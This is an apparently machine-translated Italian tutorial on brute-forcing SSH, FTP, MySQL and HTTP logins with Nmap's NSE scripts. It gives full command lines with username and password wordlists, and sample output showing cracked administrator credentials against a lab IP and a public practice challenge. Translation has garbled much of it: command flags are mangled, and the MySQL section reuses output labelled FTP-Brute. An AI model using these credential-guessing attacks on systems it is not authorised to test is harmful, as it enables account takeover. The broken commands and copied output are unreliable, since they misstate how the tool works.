Password-Brute-Forcing utilizzando NMAP

Password-Brute-Forcing utilizzando NMAP
Per forzare i servizi online, le persone usano normalmente Hydra, Medusa e Metasploit Framework, ma NMAP può anche essere utilizzato per forzare molti servizi online. Ci sono script NMAP integrati che supportano FTP, Mysql, SMTP, SNMP, SSH, Telnet, LDAP e altri vari servizi. È inoltre possibile che i metodi di autenticazione basati su moduli HTTP basati su HTTP siano basati su HTTP. Se hai installato NMAP, puoi vedere questi script nella directory "Usr/Share/Nmap/Scripts".
ubuntu@ubuntu: ~ $ sudo apt update && sudo apt upgrade
ubuntu@ubuntu: ~ $ sudo apt install nmap -y
ubuntu@ubuntu: ~ $ cd/usr/share/nmap/scripts/
ubuntu@ubuntu: ~ $ ls *brute *

In questo tutorial, esploreremo come possiamo usare NMAP per un attacco a forza bruta.

SSH Brute-Force

SSH è un protocollo di amministrazione remoto sicuro e supporta l'autenticazione basata su OpenSSL e password. Per l'autenticazione basata su password SSH Brute-Force, possiamo usare “SSH-BRUTE.script NSE ”NMAP.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ssh*brute*
SSH-BRUTE.nse

Passa il nome utente e l'elenco delle password come argomento per NMAP.

ubuntu@ubuntu: ~ $ nmap -Script SSH -BRUTE -P22 192.168.43.181
--script-args userdb = utenti.txt, passdb = password.TXT
Avvio di NMAP 7.70 (https: // nmap.org) al 2020-02-08 17:09 PKT
Rapporto di scansione NMAP per 192.168.43.181
L'host è attivo (0.00033s latenza).
Port State Service
22/TCP Open SSH
| SSH-BRUTE:
| Account:
| Amministratore: P4SSW0rd - Credenziali valide
| _ Statistiche: eseguito 99 ipotesi in 60 secondi, TPS medio: 1.7
NMAP fatto: 1 indirizzo IP (1 host up) scansionato in 60.17 secondi

FTP Brute-Force

FTP è un protocollo di trasferimento di file che supporta l'autenticazione basata su password. Per force bruto FTP, useremo “FTP-Blute.script NSE ”NMAP.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*brute*
FTP-Brute.nse

Passa il nome utente e l'elenco delle password come argomento per NMAP.

ubuntu@ubuntu: ~ $ nmap -Script ftp -brute -p21 192.168.43.181-Script-args
userdb = utenti.txt, passdb = password.TXT
Avvio di NMAP 7.70 (https: // nmap.org) al 2020-02-08 16:51 PKT
Rapporto di scansione NMAP per 192.168.43.181
L'host è attivo (0.00021s latenza).
Port State Service
21/TCP Open FTP
| FTP-Brute:
| Account:
| Amministratore: P4SSW0rd - Credenziali valide
| _ Statistiche: eseguito 99 ipotesi in 20 secondi, TPS medio: 5.0
NMAP fatto: 1 indirizzo IP (1 host up) scansionato in 19.50 secondi

Mysql Brute-Force

A volte, MySQL viene lasciato aperto alle connessioni esterne e consente a chiunque di connettersi ad esso. La sua password può essere rotta utilizzando NMAP con script "Mysql-Brute".

ubuntu@ubuntu: ~ $ sudo nmap - -script mysql -blute -p3306 192.168.43.181
--script-args userdb = utenti.txt, passdb = password.TXT
Avvio di NMAP 7.70 (https: // nmap.org) al 2020-02-08 16:51 PKT
Rapporto di scansione NMAP per 192.168.43.181
L'host è attivo (0.00021s latenza).
Port State Service
3306/TCP Open Mysql
| FTP-Brute:
| Account:
| Amministratore: P4SSW0rd - Credenziali valide
| _ Statistiche: eseguito 99 ipotesi in 20 secondi, TPS medio: 5.0
NMAP fatto: 1 indirizzo IP (1 host up) scansionato in 19.40 secondi

HTTP Brute-Force

HTTP utilizza tre tipi di autenticazione per autenticare gli utenti sui server Web. Queste metodologie sono utilizzate in router, modem e applicazioni Web avanzate per scambiare nomi utente e password. Questi tipi sono:

Autenticazione di base

Nel protocollo di autenticazione di base HTTP, il browser codifica il nome utente e la password con Base64 e lo invia nell'intestazione "Autorizzazione". Puoi vederlo nella seguente screenshot.

Autorizzazione: base ywrtaw46ywrtaw4 =

È possibile decodificare la base64 questa stringa per visualizzare il nome utente e la password

ubuntu@ubuntu: ~ $ echo ywrtaw46ywrtaw4 = | base64 -d
Admin: Admin

L'autenticazione di base HTTP è insicura perché invia sia nome utente che password in testo normale. Qualsiasi attaccante man-in-the-middle può facilmente intercettare il traffico e decodificare la stringa per ottenere la password.

Digest Autentication

L'autenticazione digest http utilizza tecniche di hashing per crittografare il nome utente e la password prima di inviarlo al server.

Hash1 = md5 (nome utente: regno: password)
HASH2 = MD5 (Metodo: Digesturi)
Risposta = MD5 (HASH1: Nonce: noncecount: CNONCE: QOP: HASH2)

Puoi vedere questi valori sotto l'intestazione "autorizzazione".

L'autenticazione basata su digest è sicura perché la password non viene inviata in testo normale. Se un attaccante man-in-the-middle intercetta il traffico, non sarà in grado di ottenere la password di testo normale.

Autenticazione basata su moduli

L'autenticazione di base e digest supporta solo il trasferimento di nome utente e password mentre l'autenticazione basata su moduli può essere personalizzata in base alle esigenze dell'utente. Puoi creare la tua pagina Web in HTML o JavaScript per applicare le tue tecniche di codifica e trasferimento.

Di solito l'autenticazione basata su moduli viene inviata in testo normale. Per problemi di sicurezza, gli HTTP devono essere applicati per prevenire gli attacchi man-in-the-middle.

Possiamo bruto forzare tutti i tipi di autenticazione HTTP usando NMAP. Useremo lo script "Http-Brute" a tale scopo.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*http*brute*
HTTP-BRUTE.nse

Per testare questa sceneggiatura NMAP, risolveremo una sfida Brute-Force ospitata pubblicamente da Pentester Academy a questo URL http: // pentesteracademylab.appspot.com/lab/webapp/basicauth.

Dobbiamo fornire tutto tra cui nome host, URI, metodo di richiesta e dizionari separatamente come argomento di script.

ubuntu@ubuntu: ~ $ sudo nmap -p80 - -script http -bruto pentesteracademylab.appspot.com
--script-args http-blut.Hostname = PenteSteracademylab.appspot.com,
HTTP-BRUTE.Path =/lab/webapp/basicauth, userdb = utenti.txt, passdb = password.TXT,
HTTP-BRUTE.Metodo = post
Avvio di NMAP 7.70 (https: // nmap.org) a 2020-02-08 21:37 PKT
Rapporto di scansione NMAP per Pentesteracademylab.appspot.com (216.58.210.84)
L'host è attivo (0.Latenza 20S).
Altri indirizzi per pentesteracademylab.appspot.com (non scansionato): 2a00: 1450: 4018: 803 :: 2014
record RDNS per 216.58.210.84: MCT01S06-in-F84.1e100.netto
Port State Service
80/TCP Open HTTP
| http-blute:
| Account:
| Amministratore: Aaddd - Credenziali valide
| _ Statistiche: eseguito 165 ipotesi in 29 secondi, TPS medio: 5.3
NMAP fatto: 1 indirizzo IP (1 host up) scansionato in 31.22 secondi

Conclusione

NMAP può essere usato per fare molte cose nonostante la semplice scansione delle porte. Può sostituire Metasploit, Hydra, Medusa e molti altri strumenti realizzati appositamente per la forzatura bruta online. NMAP ha script incorporati semplici e facili da usare che forcano quasi tutti i servizi tra cui HTTP, Telnel, SSH, Mysql, Samba e altri.